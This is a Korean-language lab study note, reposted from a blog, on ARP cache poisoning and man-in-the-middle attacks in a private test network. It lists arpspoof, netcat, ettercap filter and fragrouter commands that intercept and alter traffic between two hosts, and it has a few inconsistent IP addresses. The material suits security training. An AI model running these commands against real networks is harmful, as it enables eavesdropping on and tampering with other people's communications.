2일차...

다른 곳에서 가져 왔습니다. 출처 : http://blog.paran.com/zeze91/20133543 

whoppix (whithat knoppix) : debian을 기준으로 만듬  livecd

 

backtrack  

 

 

host-only모드

 

#ifconfig eth0 172.168.1.40 netmask 255.255.255.0

 

원리에 충실하자!

 

 

whoppox에 포함된툴

 

arpspoof -t  victim1    victim2   : arp reply를 이용한 공격

                 (where)   (what)

 

 

   Ehthernet        | OP code(2bit)  | Sender Mac | Sender IP | Target Mac | Target IP

                           1: who-has

                           2: is-at

 

arpspoof -t A B 명령어 사용시

MH, MA, arp                 2                     MH                B                 MA                    A

 

 

실습목적 : 172.16.1.1 의 arp cache table을 조작하여 172.16.1.100 시스템에 대한 MAC어드레스를 속인다.

1. arp cache table확인 (172.16..1. 시스템)

    Windows의 경우 unsolicited arp reply를 수신한 경우 arp cache table에 해당 시스템에 대한 항목이 존재하지 않으면 무시한다. 따라서 실습전에 172.16.1.100에 대한 항목이 172.16.1.1시스템의 arp cache table에 존재함을 확인해야함

 

확인방법 : arp -a

존재하지 않는 경우 ping을 보낸 후 다시 확인

ping 172.16.12.100

arp -a

 

2. 공격자는 조작된 arp reply를 전송하여 arp 캐쉬 테이블을 조작한다.

arpspoof -t 172.16.1.1 172.16.1.100

 

3. arp cache table 확인 (172.16.1.1)

 

 

===================== 패킷 변조 ========================

   netcat : nc.exe

nc -lvp

      l : Listen

      v : 상세출력

      p : port 설정

nc <ipaddress> <port>  접속

 

등장인물

victim1 172.16.1.1 : nc -lvp 8080    (리스닝)

victim2 172.16.1.100 : nc 182.16.1.1 8080 (접속)

attacker 172.16.1.40(공격자)

실습목표 : arp cache poisoning을 이용한 MITM 공격을 통해 victim1과 victim2가 주고 받는 데이터를 실시간으로 조작

 

실습방법:

1. victim1 과 victim2간 통신

    victim1   nc -lvp 12345

    victim2  nc victim1 12345

2. [공격자] 필터링 파일 작성 (파일이름.ecf)

     if ( search(DATA.data,"attack") )

     {

         replace("attack","withdraw");

      }

3. [공격자]  필터 파일을 인코딩

    etterfilter -o 파일이름.ef  파일이름.ecf

 

4. [공격자] 공격 시작

    ettercap -T -M arp -F 파일이름.ef /victim1/ /victim2/

   

    ettercap 툴자체가 패킷을 포워딩함 (커널이 포워딩 모드에 있어도안됨)

 

http://packetstormsecurity.nl  --> search-->nc11nt

   

==========================================================================================

1. arpspoof -t a b

2. arpspoof -t b a                

3. forwarding 활성화

    - 1) 커널 레벨   /> /proc/sys/net/ipv4/ip-forward

    - 2) User 레벨  : fragrouter -B1  (IDS우회 공격 테스트에 상요됨)  : TTL값을 변경안함.

4. sniffing

http://blog.paran.com/zeze91/20133543